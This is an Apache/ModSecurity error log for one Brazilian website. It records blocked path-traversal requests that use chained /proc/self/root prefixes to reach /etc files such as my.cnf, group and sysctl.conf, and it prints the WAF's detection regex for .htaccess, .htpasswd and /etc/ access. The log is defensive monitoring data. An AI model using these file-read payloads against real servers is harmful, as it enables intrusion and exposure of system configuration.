[Fri Mar 20 11:29:26.958219 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:57012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Zxrninkcc-iUj5AqKRgAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:29:29.439162 2026] [:error] [pid 11642:tid 140411632822016] [client 57.141.18.7:35672] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Zybninkcc-iUj5AqKSgAAA40"]
[Fri Mar 20 11:29:45.132249 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:43514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Z2da6ubjKNq_cu4YIvwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:29:46.919559 2026] [:error] [pid 21219:tid 140411683178240] [client 57.141.18.61:36352] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Z2vXLqtnMIWvjpaLITwAAAoc"]
[Fri Mar 20 11:29:47.664130 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.60:36340] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Z2_XLqtnMIWvjpaLIUgAAAo4"]
[Fri Mar 20 11:30:06.320879 2026] [mime_magic:error] [pid 31215:tid 140411699963648] (70014)End of file found: [client 57.141.18.3:36920] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:30:11.926624 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:53062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Z8vqxLDW4GITHUkQXogAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:30:16.393782 2026] [mime_magic:error] [pid 7235:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:37478] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:30:16.397782 2026] [mime_magic:error] [pid 15826:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:37474] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:30:46.200749 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.241.31:54960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aFl1pVZ5mVmJwsFNcUgAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:30:51.633775 2026] [mime_magic:error] [pid 9818:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:39520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:30:51.704947 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.244.43:39380] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1aGxCii7xarUs8iHaXvAAAAhQ"]
[Fri Mar 20 11:30:52.567769 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.243.128:34222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aHPHIg5MgXLBnicMjfgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:30:56.059949 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.241.31:44212] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aIPHIg5MgXLBnicMjhwAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:30:58.759207 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:59462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aIta6ubjKNq_cu4YJFwAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:31:03.342875 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.30:40164] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1aJ11pVZ5mVmJwsFNcYgAAAFA"]
[Fri Mar 20 11:31:04.695744 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.61:40272] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1aKBCii7xarUs8iHaXzQAAAhQ"]
[Fri Mar 20 11:31:14.008006 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:59472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aMvXLqtnMIWvjpaLIqwAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:31:15.333466 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:54870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aM-oXxyEfFpUF8f-tkgAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:31:16.027568 2026] [:error] [pid 11642:tid 140411557287680] [client 57.141.18.1:40914] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1aNLninkcc-iUj5AqKoAAAA5Y"]
[Fri Mar 20 11:31:18.649559 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:60396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aNda6ubjKNq_cu4YJPAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:31:33.758473 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:54884] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aRfXLqtnMIWvjpaLIvwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Fri Mar 20 11:31:40.387196 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:57814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1aTBCii7xarUs8iHaYBgAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:31:42.362781 2026] [mime_magic:error] [pid 7235:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:41744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:31:43.413780 2026] [mime_magic:error] [pid 11642:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:41806] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:31:44.456931 2026] [:error] [pid 7235:tid 140411649607424] [client 216.73.216.191:41874] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aUPqxLDW4GITHUkQX7wAAAQs"]
[Fri Mar 20 11:31:44.790992 2026] [:error] [pid 10189:tid 140411658000128] [client 216.73.216.191:41914] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aUDJ3M9BSuKP7CAZVEgAAAIo"]
[Fri Mar 20 11:31:45.267204 2026] [:error] [pid 7235:tid 140411574073088] [client 216.73.216.191:41814] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aUfqxLDW4GITHUkQX8QAAARQ"]
[Fri Mar 20 11:31:45.336265 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:41952] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:31:45.665946 2026] [:error] [pid 31215:tid 140411708356352] [client 216.73.216.191:41978] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aUQF0L0L-SsrnPo6W8QAAAsQ"]
[Fri Mar 20 11:31:48.122988 2026] [:error] [pid 21219:tid 140411699963648] [client 216.73.216.191:42088] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aVPXLqtnMIWvjpaLIxAAAAoU"]
